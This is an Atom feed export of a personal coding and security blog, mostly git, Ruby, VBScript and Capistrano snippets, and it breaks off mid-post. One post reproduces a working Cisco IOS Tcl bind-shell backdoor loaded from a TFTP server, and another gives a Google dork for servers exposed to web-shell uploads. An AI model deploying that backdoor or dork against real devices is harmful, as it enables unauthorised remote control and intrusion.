tag:blogger.com,1999:blog-264186192024-03-13T00:58:54.491+00:00codeBurstIts the Code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man.
VBS, PHP, TCL, TK, PERL, C++, JAVA....what now? Ruby?
No Wait.. It should be just RUBY!shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.comBlogger47125tag:blogger.com,1999:blog-26418619.post-91409800725958046162011-11-03T15:31:00.001+00:002011-11-03T15:31:27.680+00:00<div dir="ltr" style="text-align: left;" trbidi="on">
bin/git-truncate 33174e010f5c586ecd89ce47067f796b751989f5
<br />
<pre><code>
#!/bin/bash
# usage: git-truncate refhashtag
git checkout --orphan temp $1
git commit -m "Truncated history"
git rebase --onto temp $1 master
git branch -D temp
</code>
<pre></pre>
</pre>
</div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com1tag:blogger.com,1999:blog-26418619.post-51901894880896100792011-10-27T13:39:00.001+00:002011-11-03T15:29:08.746+00:00<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="post-text">
I've been using git for a while and forget some things.. so for the sake of repeating the internet.<br />
<br />
<b>Revert Working Copies</b><br />
<br />
For a specific file use:<br />
<br />
<pre><code>git checkout path/to/file/to/revert
</code></pre>
<br />
For all unstaged files use:<br />
<pre><code> </code></pre>
<pre><code>git checkout -- .
</code></pre>
<br />
Make sure to include the period at the end.<br />
<br />
<b>Merge in remote</b> <br />
<br />
<pre><code>git checkout master
git remote add username git://github.com/username/repo.git
git fetch username
git merge username/master-or-branch-name
git push origin master</code></pre><br />
<b>Update existing remote</b>
<br />
<pre>shadowbq@thaw:~/snorby_suite$ git remote
origin
shadowbq@thaw:~/snorby_suite$ git fetch origin
remote: Counting objects: 5, done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 3 (delta 2), reused 0 (delta 0)
Unpacking objects: 100% (3/3), done.
From github.com:shadowbq/snorby_suite
33174e0..7109d83 master -> origin/master
shadowbq@thaw:~/snorby_suite$ git merge origin/master
Updating 33174e0..7109d83
Fast-forward
TODO.md | 14 +++++++-------
1 files changed, 7 insertions(+), 7 deletions(-)
</pre>
</div>
</div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-45661737558959178322010-02-22T13:16:00.001+00:002010-02-22T13:18:25.934+00:00A quick look at object_id in ruby.. <br />
<br />
<a href="http://www.oreillynet.com/ruby/blog/2006/02/ruby_values_and_object_ids.html">Ruby VALUEs and object_ids</a> @oreillynet has a detailed explanation about the assignment method.<br />
<br />
<div id="code">irb(main):001:0> "".object_id<br />
=> 23653260<br />
irb(main):002:0> "".object_id<br />
=> 23649800<br />
irb(main):003:0> 1.object_id<br />
=> 3<br />
irb(main):004:0> 0.object_id<br />
=> 1<br />
irb(main):005:0> 2.object_id<br />
=> 5<br />
irb(main):006:0> true.object_id<br />
=> 2<br />
irb(main):007:0> false.object_id<br />
=> 0<br />
irb(main):008:0> nil.object_id<br />
=> 4<br />
irb(main):009:0> @foo = 1<br />
=> 1<br />
irb(main):010:0> @foo.object_id<br />
=> 3<br />
irb(main):011:0> @foo.object_id<br />
=> 3<br />
irb(main):012:0> @foo = " "<br />
=> " "<br />
irb(main):013:0> @foo.object_id<br />
=> 23612570<br />
irb(main):014:0> @foo.object_id<br />
=> 23612570<br />
</div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-57962880336285183582010-02-11T17:29:00.000+00:002010-02-11T17:29:17.111+00:00pcaprubPcaprub was very fractured throughout the ruby community so I merged many of the projects together. This is the new hotness. :)<br />
<br />
<span><b>gem install pcaprub</b></span><br />
<br />
Requirements:<br />
<br />
libpcap - http://www.tcpdump.org<br />
<br />
<a href="http://github.com/shadowbq/pcaprub">http://github.com/shadowbq/pcaprub</a>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-14609499545064892632009-08-05T12:09:00.001+00:002009-08-05T12:12:24.413+00:00VBS Script to map NAS network smb drives over specific SSID wifi homenets (non GPO script)I recently posted this script on <a href="http://groups.google.com/group/microsoft.public.scripting.vbscript/browse_thread/thread/0161a82e4779e2eb/f1aedc258a5a433a?#f1aedc258a5a433a">usenet</a> because some many people now<br />have NAS storage devices accessible via there home wifi networks.<br /><br />This script should help out the people with the question on how to mount a network attached storage device (like my coolmax NAS) to there windows profile during windows boot.<br /><br />This vbs works by utilizing the wmi and cimv2 mappings to access the the MSNdis_80211_Configuration and the Win32_NetworkAdapter references.<br /><br />You need to have the local WMI service enabled for this to work.<br /><br />FYI:This has been tested under Windows XP.<br /><br /><div id="code"><br />'file: nasmapper.vbs<br />'launch with "cscript c:\nasmapper.vbs //nologo" -> /programs/startup<br />'VBS Script to map NAS over wifi homenets (non GPO script)<br /> <br />'Shadowbq - 2009 BSD License<br />'Reference Functions: ScriptGuy! (MS)<br />', quiet_lurker (neowin), Aaron P(neowin)<br /> <br />Option Explicit<br /> <br />Dim objWMIService, objNet<br />Dim intSleep, WNICName, knownSSID, retries, maxRetries<br />Dim mapDrive, mapLocation, mapUsername, mapPassword<br /> <br />knownSSID="URWP80" 'SSID of Hotspot that has mapped location<br />WNICName="Dell Wireless 1470 Dual Band WLAN Mini-PCI Card" <br />'Nic name listed in WMI<br />maxRetries = 10 <br />'maxRetries * intSleep/1000 ~= total possible seconds<br />intSleep = 2000 'wait cycles<br />mapDrive = "Y:" 'Map to Drive<br />mapLocation = "\\storage\public" 'Location of Share<br />mapUsername = "Guest" 'User Account for Share<br />mapPassword = "" 'User Password for Share<br /> <br />'If your having problems finding the WNICName you can use the<br />'\\root\wmi call to ("Select * From MSNdis_80211_Configuration") flip<br />' through all wireless devices..<br /> <br /> <br />Private Sub GetWMI(WMIArray, WMIQuery, WMIRoot)<br /> 'On error resume Next<br /> DIM WMIClass<br /> <br /> Set WMIClass = GetObject("winmgmts:{impersonationLevel=impersonate}!\_<br />\.\root\" & WMIRoot)<br /> If not(WMIClass is nothing) Then Set WMIArray = WMIClass.ExecQuery_<br />(WMIQuery)<br /> <br />End Sub<br /> <br /> <br />Function SSID()<br /> 'On error resume Next<br /> DIM objSSIDSet, objSSID, ID, i<br /> <br /> Call GetWMI(objSSIDSet, "Select * from_<br />MSNdis_80211_ServiceSetIdentifier Where active=true", "wmi")<br /> <br /> For Each objSSID in objSSIDSet<br /> ID = ""<br /> <br /> For i = 0 to objSSID.Ndis80211SsId(0)<br /> ID = ID & chr(objSSID.Ndis80211SsId(i + 4))<br /> Next<br /> <br /> SSID = ID<br /> Next<br />End Function<br /> <br />Function WNICStatus()<br /> Dim colItems, objItem, strStatus<br /> <br /> Call GetWMI(colItems, "Select * from Win32_NetworkAdapter where Name_<br />= '" & WNICName & "'", "cimv2")<br /> <br /> For Each objItem in colItems<br /> Select Case objItem.NetConnectionStatus<br /> Case 0 strStatus = "Disconnected"<br /> Case 1 strStatus = "Connecting"<br /> Case 2 strStatus = "Connected"<br /> Case 3 strStatus = "Disconnecting"<br /> Case 4 strStatus = "Hardware not present"<br /> Case 5 strStatus = "Hardware disabled"<br /> Case 6 strStatus = "Hardware malfunction"<br /> Case 7 strStatus = "Media disconnected"<br /> Case 8 strStatus = "Authenticating"<br /> Case 9 strStatus = "Authentication succeeded"<br /> Case 10 strStatus = "Authentication failed"<br /> Case 11 strStatus = "Invalid address"<br /> Case 12 strStatus = "Credentials required"<br /> End Select<br /> Next<br /> <br /> WNICStatus = strStatus<br />End Function<br /> <br />Function fnMapNetworkDrive (Drive, Path, Uname, Upass)<br /> Dim i, oDrives<br /> set objNet = Wscript.CreateObject("Wscript.Network")<br /> Set oDrives = objNet.EnumNetworkDrives<br /> For i = 0 to oDrives.Count - 1 Step 2 <br /> ' Find out if an existing network drive exists<br /> If oDrives.Item(i) = Drive Then<br /> WScript.Echo "Removing drive: " & Drive<br /> objNet.RemoveNetworkDrive Drive, true, true<br /> End If<br /> Next<br /> WScript.Echo "Mapping drive: " & Drive & " to path: " & Path<br /> objNet.MapNetworkDrive Drive, Path, false, Uname, Upass<br /> fnMapNetworkDrive = "[completed mapping drive]"<br /> Set i = Nothing<br /> Set oDrives = Nothing<br /> Set Drive = Nothing<br /> Set Path = Nothing<br />End Function<br /> <br />Dim nicStatus, nicSSID<br /> <br />WScript.Echo "NAS Wifi Mapper"<br />WScript.Echo "=-=-=-=-=-=-=-=-=-=-=-=-=-=-"<br />WScript.Echo "[Checking NIC Status]"<br /> <br />nicStatus = WNICStatus()<br />retries = 0<br /> <br />while (StrComp(nicStatus, "Connected") <> 0)<br /> If (retries < maxRetries) Then<br /> retries = retries + 1<br /> Wscript.Echo "Nic " & nicStatus & ".."<br /> Wscript.Sleep intSleep<br /> nicStatus = WNICStatus()<br /> Else<br /> Wscript.Error "*** Max # of connection attempts reached"<br /> End If<br />Wend<br />Wscript.Echo "Connected .. continuing"<br /> <br />WScript.Echo "[Checking SSID Status]"<br />nicSSID = SSID()<br />nicSSID = Left(nicSSID, len(nicSSID)-1)<br /> <br />Wscript.Echo "SSID: " & nicSSID<br /> <br />If (StrComp(nicSSID, knownSSID) = 0) Then<br /> Wscript.Echo "[Correct SSID]"<br />Else<br />On Error Resume Next<br /> Dim errDescription, errSource<br /> errSource = "NAS Mapper"<br /> errDescription = "Incorrect SSID for network share to be established"<br /> Wscript.Echo "An Error:'" & errDescription & "' by '" & errSource &_<br />"'."<br /> WScript.Quit 8<br />End If<br /> <br />WScript.Echo "[Mapping Drive] "<br />Wscript.Echo fnMapNetworkDrive (mapDrive, mapLocation, mapUsername,<br />mapPassword)<br /> <br />WScript.Quit<br /></div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com2tag:blogger.com,1999:blog-26418619.post-58518663574274532872008-09-26T15:49:00.003+00:002008-09-26T16:01:52.379+00:00Command Line Capistrano Forked<div id="code">#!/usr/local/bin/ruby<br /><br /># Command Line Capistrano Forked <br /># (Forked version) <br /># written by Scott MacGregor - 2008<br /><br />require 'rubygems'<br />require 'capistrano/configuration'<br />require 'stringio'<br />require 'optparse'<br />require 'syslog'<br /><br /><br />#Gather list of hosts and create capistrano role string<br />def monitorlist(hostlist)<br /> commandstring = "role :sensor, "<br /> if hostlist.respond_to? :last<br /> hostlist.each do |hosttarget|<br /> hosttarget == hostlist.last ? commandstring << "\"#{hosttarget.strip}\"" : commandstring << "\"#{hosttarget.strip}\", "<br /> end<br /> else<br /> commandstring << "\"#{hostlist.strip}\""<br /> end<br /> return commandstring<br />end <br /><br />#Perfom desired login method<br />def logit (outputIO, logmethod)<br /> if logmethod <br /> Syslog.open('monitord') <br /> outputIO.string.each {|line| <br /> <br /> #ignore monitord information lines<br /> if line.include?("\[monitord\]")<br /> next<br /> end<br /> <br /> <br /> #strip out tty special characters<br /> # ^\[[33m<br /> line.gsub!(/\^\[\[[0-9]+m/,"")<br /> # \e[37m<br /> line.gsub!(/\e\[[0-9]+m/,"")<br /> # \033[31m<br /> line.gsub!(/\\[0-9]+\[[0-9]+m/,"")<br /> <br /> #strip out preceding stars<br /> line.gsub!(/^\s*[*]*/,"")<br /> <br /> line.strip!<br /> <br /> #uncomment this line if you want STDOUT while SYSLOGING<br /> #p line<br /> <br /> if line.downcase.include?("fail")<br /> Syslog.crit(line)<br /> else<br /> Syslog.notice(line)<br /> end<br /> }<br /> end<br />end<br /><br /># Run Forked Process <br />def tick(queryhost, outputIO, logmethod)<br /> pid = fork {<br /><br /> pidhost = Capistrano::Configuration.new<br /> if OPTIONS[:syslog] <br /> pidhost.logger = Capistrano::Logger.new(:output => outputIO)<br /> else<br /> pidhost.logger = Capistrano::Logger.new<br /> end<br /> pidhost.load(File.dirname(File.expand_path(__FILE__)) + "/capfile")<br /> pidhost.load(:string => monitorlist(queryhost.strip))<br /><br /> # pidhost.set :user, 'capistrano'<br /> # pidhost.ssh_options[:username] = monitord'<br /> # pidhost.ssh_options[:host_key] = 'ssh-dsa'<br /> # pidhost.ssh_options[:paranoid] = false <br /> <br /> pidhost.logger.level = OPTIONS[:debug_level]<br /> begin<br /> #Call the Capistrano Namespace & command to fork<br /> pidhost.monitor.default<br /> rescue Exception => e<br /> puts "\t[" + queryhost.strip + "] " + " Failed to establish connection."<br /> outputIO.puts "\t[" + queryhost.strip + "] " + " Failed to establish connection."<br /> end<br /> <br /> logit(outputIO, logmethod)<br /> <br /> }<br /> Process.waitpid(pid, Process::WNOHANG)<br />end<br /><br /><br /># Set default options and initializations<br />OPTIONS = {<br /> :file => "monitorlist",<br /> :syslog => false,<br /> :debug_level => 0,<br /> :dest => File.expand_path(File.dirname($0)),<br /> :hostslist => ""<br />}<br />hosts=[]<br /><br />#Read Command Line Options<br />ARGV.options do |o|<br /> script_name = File.basename($0)<br /> <br /> o.set_summary_indent(' ')<br /> o.banner = "Usage: #{script_name} [OPTIONS]"<br /> o.define_head "Run capistrano command forked from outside capistrano with additional options.\nWritten by: Scott MacGregor 2008"<br /> <br /> o.separator ""<br /> o.separator "Monitord options:"<br /> o.on("-R", "--read=[val]", String,<br /> "Read monitor host list from file",<br /> "Default: #{OPTIONS[:file]}") { |OPTIONS[:file]| }<br /> o.on("-L", "--hosts=[val]", String,<br /> "List of comma seperated hosts. Encased in double quotes.", "(*OVERRIDES -R option)" ) { |OPTIONS[:hostslist]| }<br /> o.on("-S", "--syslog",<br /> "SYSLOG all output") { |OPTIONS[:syslog]| }<br /> <br /> o.separator ""<br /> o.separator "Common Usage: "<br /> o.separator "\t./monitord --hosts=\"hostname1, hostname2\""<br /> o.separator "\t./monitord -R \"customhosts.txt\""<br /> <br /> o.separator ""<br /> o.separator "Common options:"<br /> o.on("--debug=[0-3]", Integer, <br /> "Debug verbosity level",<br /> "Default: #{OPTIONS[:debug_level]}") { |OPTIONS[:debug_level]| }<br /> o.on_tail("-h", "--help", "Show this help message.") { puts o; exit }<br /> <br /> begin<br /> o.parse!<br /> rescue OptionParser::InvalidOption => e<br /> abort "-h --help Show this help message."<br /> end<br /><br />end<br /><br />if OPTIONS[:hostslist] == ""<br /> #Read standard Capistrano Role string configuration file.<br /> File.open(File.dirname(File.expand_path(__FILE__)) + "/#{OPTIONS[:file]}").each { |line|<br /> hosts = line[(line.index(",")+2)..-1].gsub("\"","").strip.split(',') if not line =~ /^\s*#/<br /> }<br />else<br /> #Read env option string <br /> hosts = OPTIONS[:hostslist].split(',')<br />end<br /><br /># -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-<br />#Begin Main Loop<br /><br />outputIO = StringIO.new<br />logmethod = OPTIONS[:syslog]<br /><br />for host in hosts<br /> tick(host.strip, outputIO, logmethod)<br />end<br /><br /># End Main Loop<br /># -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-<br /></div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-54885814337427309532008-07-28T18:16:00.005+00:002008-07-28T23:06:07.168+00:00DNS version attempts & toolsThere has been some DNS junk flying around again.. so refresh.<br /><br />Dont forget how easy it is to do a DNS version attempt. <br /><div id="code"><br />dig @ns.example.com -c CH -t txt version.bind<br /></div><br /><br />Make sure your BIND/Named is obfuscated/disabled with custom message..<br /><br /><div id="code"><br />options<br />{<br /> version "Generic DNS Server";<br />}<br /></div><br /><br />Not that it helps much with fpdns around.<br /><div id="code"><br />anonymous@:~$ fpdns -D google.com<br />fingerprint (google.com, 216.239.34.10): ISC BIND 8.3.0-RC1 -- 8.4.4<br />fingerprint (google.com, 216.239.36.10): ISC BIND 8.3.0-RC1 -- 8.4.4<br /></div><br /><a href="http://code.google.com/p/fpdns/source/browse/trunk/trunk/Fingerprint.pm">Perl: (Fingerprint.PM)</a><br /><br /><br />Make sure your read basic DNS information like <br /><br /><a href="http://www.cisco.com/web/about/security/intelligence/dns-bcp.html">Cisco's: DNS Best Practices, Network Protections, and Attack Identification</a><br /><br />And understand the principles laid out in Secure BIND configurations such as:<br /><a href="http://www.cymru.com/Documents/secure-bind-template.html">http://www.cymru.com/Documents/secure-bind-template.html</a><br /><br />Look into DNS Debug tools such as <a href="http://sourceforge.net/projects/dnswalk/">DNSwalk</a>, <a href="http://www.freshports.org/dns/dlint/">dlint</a>, & <a href="http://www.shub-internet.org/brad/dns/">DOC</a><br /><br />And for reverse lookups use where there is no PTR record try A record caches like:<br />Passive DNS Replication @<br /><a href="http://cert.uni-stuttgart.de/stats/dns-replication.php?">http://cert.uni-stuttgart.de/stats/dns-replication.php</a>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com1tag:blogger.com,1999:blog-26418619.post-67734125211307719732008-06-05T15:02:00.005+00:002008-06-05T15:50:38.628+00:00Simple http get request... snooze.Lets get some basic headers using sbd.exe, nc, telnet whatever..<br /><br /><div id="code">telnet www.microsoft.com 80<br />nc www.microsoft.com 80<br />sbd -c off www.microsoft.com 80<br /></div><br /><br />Enter default HTTP / GET|OPTIONS|PUT|POST|HEAD|TRACE Command<br />(Using Host header is only important when there is vhosting on the IP/hostname)<br /><div id="code">GET / HTTP /1.1<br />Host: www.microsoft.com<br />Press Enter twice<br /></div><br /><br />(Windows telnet lameness.. Turning on local echo..)<br /><div id="code">Type "Ctrl+]"<br />Type "set localecho"<br />Press Enter twice<br /></div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-64915793990986879292008-04-27T04:51:00.006+00:002008-04-27T05:17:59.925+00:00Digg + Idiots + RapidShare = p0wn3d<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-f8vzruAp-wTDB9cgTX9F8azAToFtkMvTRFEtRwXJzEPI1t3eB05i_ExIp14_5VAaEs-gglVrFabNzzXGx-xSynzkC0LhTuBgBmMSgyGGQUunhQlaU9Nuo-Uf7e2G-yIA-Tbh/s1600-h/digg.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-f8vzruAp-wTDB9cgTX9F8azAToFtkMvTRFEtRwXJzEPI1t3eB05i_ExIp14_5VAaEs-gglVrFabNzzXGx-xSynzkC0LhTuBgBmMSgyGGQUunhQlaU9Nuo-Uf7e2G-yIA-Tbh/s400/digg.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5193788458383684050" /></a><br />God damn it.. dumb ideas just stay around for far too long.<br /><br />Ok we all know what the hell rapidshare is. It's a waste of internet space. One thing though a couple of years ago somebody <span style="font-style:italic;">dugg</span> an article on a way to get around restrictions using a server script called rapidleech. Ok all in good fashion, but come on... you leave this open on apache server which can process php files.. and allow public upload to your server from any url.. (r57.php c99/100.php the list just goes on and on.. ) Renaming the file really helped huh..? <br /><br />Just look at the multiversion google dork: <br />[2 years later and still 117+ zombies waiting to happen] <br /><a href="http://www.google.com/search?q=%22Bugs+Report+to+Rapidget.bug">"Bugs Report to Rapidget.bug"</a> <br /><br />Digg idiots: <a href="http://digg.com/tech_news/RapidLeech">http://digg.com/tech_news/RapidLeech</a>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-20724472461808833812008-04-16T21:05:00.002+00:002008-04-16T21:08:51.943+00:00Capistrano with highline menu.Example Capistrano file using the highline menu system.. <br /><br />(Capistrano really needs some better docs.)<br /><br /><div id="code"><br />#example capistrano menu using highline menu system <br /># Published under BSD license <br /># written by:shadowbq - http://shad0wbq.blogspot.com<br /># verified on: capistrano 2.2.0 & highline 1.4.0<br /><br />role :comps, "localhost"<br /><br />desc "Example Highline menu"<br />task :menu do<br /> Capistrano::CLI.ui.say("\nThis is with a different layout...")<br /> Capistrano::CLI.ui.choose do |menu|<br /> menu.layout = :one_line<br /><br /> menu.header = "Execute"<br /> menu.prompt = "Application? "<br /><br /> menu.choice :hello do <br /> helloworld <br /> end<br /> menu.choices(:skip, :exit) do <br /> Capistrano::CLI.ui.say("Choose not to run..") <br /> end<br /> end<br /> <br />end<br /><br />task :helloworld do<br /> run "echo helloworld."<br />end<br /></div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com1tag:blogger.com,1999:blog-26418619.post-64066878818050976932008-03-25T14:57:00.008+00:002008-03-25T15:44:44.277+00:00Mozilla Prism & Pen-testing<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://labs.mozilla.com/2007/10/prism/"><img style="float:right; margin:0 0 10px 10px; height:50%; width:50%; cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW3ZPF8aMJ-CtaFVP2EyW2rXjyANobK2eSHsTelagHkCR5hvckgyodDfr8jfLkl7iNJYKbfB-b8zg7HsYsou8i95VQ56Od0TQEsIcmALu30NcHvAT9XgTk8sCuKKNeI6G-_KO9/s400/prismlogo.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5181705439723623250" /></a><br /><a href="http://labs.mozilla.com/2007/10/prism/">Mozilla Prism </a>, one in a series of recent site-specific-browsers(ssb) has become a fairly useful tool for me. I can run the web applications under different users (run as.. ). This allows limiting access and resources to the web application. It also allows running multiple different cookie sets at one time. <br /><br />Simple example is having multiple gmail accounts logged in at one time. A more complex example is cookie manipulation while authenticated during access level enumeration.<br /><br />Prism allows for the fine tuning of ssb to accommodate multiple pentesting angles.In the past I've <a href="https://addons.mozilla.org/en-US/firefox/addon/2776">rebranded Firefox</a> and done similar things as running as guest users, but it was never this easy. <a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://icontexto.blogspot.com/"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS4-5mahFw8c-kxkm5plXxfM_pSaWRr02f0BFIFDK_Y6kSHyXqdVmWyViA4oWNRRy3uXXtQbLZqgJgjrbtLq-UvDShNc5Q_bbE5Axu_3H3-oWVox2yO1I6MaAYdVvD-RzOIr1W/s400/Internet-48x48.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5181703064606708546" /></a><br /><br /><span style="font-weight:bold;">Prism and Flash on Windows</span><br />Its is pretty simple to enable your plugins (not talking extensions here.. ) on Prism on a windows system. All you have to do is copy your {program files}\Mozilla Firefox\plugins directory to your {program files}\Prism\Plugins directory. The Prism plugins directory doesnt exist by default and needs to be created. You may also want to copy the files into the XULRunner plugins directory. XUL runner handles any XUL apps that may depend on those plugins as well.shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-63580748856125819862007-11-28T16:36:00.000+00:002007-11-28T16:43:30.273+00:00Shell code for IOS using TCLSH on Cisco devices..An nice article that went out by IRM talked about simple way to create TCL backdoor for cisco IOS. You can read the white paper <a href="http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes">here</a>.<br />Oops: didnt known what I was sourcing..<br /><div id="code"><br />Router>en<br />Router#tclsh<br />Router(tcl)#source tftp://tftpserver/tclsh.tcl <br /></div><br />Source:<br /><div id="code"><br /># TclShell.tcl v0.1 by Andy Davis, IRM 2007<br />#<br /># IRM accepts no responsibility for the misuse of this code<br /># It is provided for demonstration purposes only<br />proc callback {sock addr port} {<br />fconfigure $sock -translation lf -buffering line<br />puts $sock " "<br />puts $sock "-------------------------------------"<br />puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"<br />puts $sock "-------------------------------------"<br />puts $sock " "<br />set response [exec "sh ver | inc IOS"]<br />puts $sock $response<br />set response [exec "sh priv"]<br />puts $sock $response<br />puts $sock " "<br />puts $sock "Enter IOS command:"<br />fileevent $sock readable [list echo $sock]<br />}<br />proc echo {sock} {<br />global var<br />if {[eof $sock] || [catch {gets $sock line}]} {<br />} else {<br />set response [exec "$line"]<br />puts $sock $response<br />}<br />}<br />set port 1234<br />set sh [socket -server callback $port]<br />vwait var<br />close $sh <br /></div><br />All material is IRM's, this is just a snippet from the article.shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-62174296705944623452007-11-19T15:15:00.000+00:002007-11-19T15:20:53.096+00:00Low hangin fruitHacking old skool windows..<br /><br />Notes from a CEH. Nothing new, but at least the basic are covered. This all should be automated by some wrapper so you don't waste time.. Generally you could do all this in Backtrack or similar builds.<br /><br /><a href="http://hackathology.blogspot.com/2007/06/hacking-old-skoolz-windows.html">http://hackathology.blogspot.com/2007/06/hacking-old-skoolz-windows.html</a>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-62450724108069096082007-11-16T16:48:00.000+00:002007-11-16T19:51:59.077+00:00RSS / ATOM - Security Tagging Framework for Yahoo PIPES<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWvkyJ4zPT1v7VF91VbU0pW18Mzh2ynJlv-m4TrmpsI1y5H4VwatyASn59C6IlHLT6vSBALNlEWxk5U4x-FwoU__8azRcgtMRL5C2B0tsdPRY9Ol_hqy_FRAMNGxeFAoURFP0D/s1600-h/stfw.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWvkyJ4zPT1v7VF91VbU0pW18Mzh2ynJlv-m4TrmpsI1y5H4VwatyASn59C6IlHLT6vSBALNlEWxk5U4x-FwoU__8azRcgtMRL5C2B0tsdPRY9Ol_hqy_FRAMNGxeFAoURFP0D/s400/stfw.png" alt="" id="BLOGGER_PHOTO_ID_5133485745724896290" border="0" /></a><br /><br />I've been using YAHOO pipes for awhile to help filter some of the junk on full disclosure. Tagging became part of my daily habits so I thought it most appropriate to create auto taggers so I can read / filter much more quickly.<br /><br /><a href="http://pipes.yahoo.com/pipes/pipe.info?_id=jq8uEkfL2xGtHkF4mLokhQ">Security Tagging FrameWork<br /></a><br />The basics of the PIPE is an array of regular expressions that strip off unneccessary titles, duplicates, responses, and add Pre-titles such as {Vulnerability}{Web-based}.<br /><br />Ive also created an example on how to use the framework with existing YAHOO-PIPES.<br /><br /><a href="http://pipes.yahoo.com/pipes/pipe.info?_id=8C4EuxCS3BGUPJaSLO2fWQ" class="pipelink">Vulnerability Watch++ (Security Tagging Framework Example)</a><br /><br />This PIPE aggregates two feeds and uniques them, and tags them utilizing the framework twice.<br /><br />Side note:<br /><br />GNUCitizen posted two nice articles on PIPES and their flexibility to be utilized with JSON database.<br /><br />1. <a href="http://www.gnucitizen.org/blog/5-generic-yahoo-pipes-hackers-cannot-live-without">5-generic-yahoo-pipes-hackers-cannot-live-without</a><br /><br />2. <a href="http://www.gnucitizen.org/projects/renaissance/">Project Renaissance</a>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-10897043347212392002007-07-11T17:52:00.000+00:002007-07-11T17:55:39.491+00:00QRcode - semanatic posting...<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjer9YIqMzlUPXC0Me_ecVzQJDZD0xfzqR-XZTRABhbMkmgPetZLh48RHMU5yhFNrN6bwlJoteCWxZFEVqnwY8snv5tL2xg41HCtDiJFkE8m-YcTvGR-u28yVzn0foNkhWDRN4r/s1600-h/shadowbq_robo2.png"><img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjer9YIqMzlUPXC0Me_ecVzQJDZD0xfzqR-XZTRABhbMkmgPetZLh48RHMU5yhFNrN6bwlJoteCWxZFEVqnwY8snv5tL2xg41HCtDiJFkE8m-YcTvGR-u28yVzn0foNkhWDRN4r/s400/shadowbq_robo2.png" alt="" id="BLOGGER_PHOTO_ID_5085999033002097986" border="0" /></a>Email: r@qry.jp<br /><br />QRcode decoding through the web... enjoy the robot.shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com2tag:blogger.com,1999:blog-26418619.post-51856422030373195332007-05-10T21:55:00.000+00:002007-05-15T14:02:20.959+00:00Building NSIS Installers for Large File DistributionsI've been working on some solutions recently to distribute large data sets utilizing numerous compressed files groups. I decided the best way to dummy proof this was to wrap an installer around them and do it "right". So here is how to do that with an installer.<br /><br />If you need to install, with only one setup application, two or more tar, bz2, gz, or lzma compressed files (for example multiple clustered files of over 2GB containing scientific data for your application and a couple others containing the app, and maybe a required piece of library software like winpcap) you need a robust solution such as the Nullsoft Install System - <a href="http://www.nullsoft.com/free/nsis/">NSIS</a>. <br /><br />The most logical idea is to create a single file, but NSIS does have file size limitations within it's compiler. Currently it is about 2GB in size. So deploying a package of say 8GB (something that might normally fit on a Dual Layer DVD) is not possible with standard NSIS single file installers. This solution uses external plugins to decompress the files within the same directory framework as the installer. This allows you to create large file distributions that could be delivered on large media or across gigabit speed networks. <br /><br />Tools Req:<br /><br />7zip <a href="http://sourceforge.net/project/showfiles.php?group_id=14481&package_id=29413">[installer]</a> - Compression Utility<br />Notepad++ <a href="http://sourceforge.net/project/showfiles.php?group_id=95717&package_id=102072">[installer]</a> - IDE<br />NSIS <a href="http://sourceforge.net/project/showfiles.php?group_id=22049&package_id=15374">[installer]</a><br />UltraModernUI NSIS User Interface <a href="http://sourceforge.net/project/showfiles.php?group_id=146999&package_id=161955">[installer]</a> - personal choice of GUI for NSIS installer<br />Untgz Contrib plugin <a 